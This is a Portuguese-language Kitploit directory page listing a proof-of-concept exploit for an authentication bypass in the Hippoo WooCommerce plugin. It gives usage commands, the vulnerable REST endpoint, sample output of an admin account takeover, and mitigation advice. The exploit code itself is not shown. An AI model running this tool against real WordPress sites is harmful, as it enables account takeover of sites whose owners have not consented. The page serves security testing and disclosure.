Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-10580 — Exploit PoC para CVE-2026-10580 - Bypass de Autenticação no Hippoo Mobile App for WooCommerce <= 1.9.4 levando à tomada de conta de administrador | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
Autenticação e AutorizaçãoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

Exploit PoC para CVE-2026-10580 - Bypass de Autenticação no Hippoo Mobile App for WooCommerce <= 1.9.4 levando à tomada de conta de administrador

Ver Repositório
4há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - Bypass de Autenticação para Assunção de Conta de Administrador

License: MIT

Visão Geral

Esta ferramenta é um exploit de prova de conceito para CVE-2026-10580, uma vulnerabilidade de bypass de autenticação que afeta o Hippoo Mobile App for WooCommerce plugin WordPress (versões <= 1.9.4). A vulnerabilidade permite que atacantes não autenticados redefinam a senha de qualquer utilizador, incluindo administradores, levando à tomada total do site.

⚠️ Importante: Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal.

Funcionalidades

  • Enumera todos os utilizadores do WordPress através do endpoint vulnerável da API REST
  • Redefine a senha para um ID de utilizador especificado (padrão: ID do admin 1)
  • Interface simples de linha de comando com saída colorida
  • Opção para desativar a verificação SSL para ambientes de teste

Uso

Pré-requisitos

  • Python 3.6+
  • Biblioteca requests

Instalar dependências:

root@kitploit:~
pip install requests

Comando Básico

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

Opções

Exemplos

Exploit com ID de admin padrão (1) e verificação SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

Alvejar um ID de utilizador específico e desativar verificação SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

Executar sem o banner:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

Exemplo de Saída

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

Mitigação

Se você está usando o plugin Hippoo, atualize imediatamente para uma versão corrigida (>1.9.4). Adicionalmente:

  • Audite regularmente as contas de utilizador para alterações não autorizadas
  • Monitore os logs para requisições inesperadas à API para /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • Considere restringir o acesso à API REST do WordPress se não for necessário

Licença

Este projeto está licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.

Autor

0xgh057r3c0n

Aviso Legal

O autor não é responsável por qualquer uso indevido desta ferramenta. Use com responsabilidade e apenas em sistemas que você possui ou tem permissão explícita para testar.

Baixar ferramenta
ArgumentoDescrição
-t, --targetURL do site WordPress alvo (ex.: https://example.com)
-p, --passwordNova senha para definir na conta de administrador
-i, --idID do utilizador a assumir (padrão: 1)
-k, --insecureIgnorar verificação de certificado SSL
--no-bannerSuprimir o banner ASCII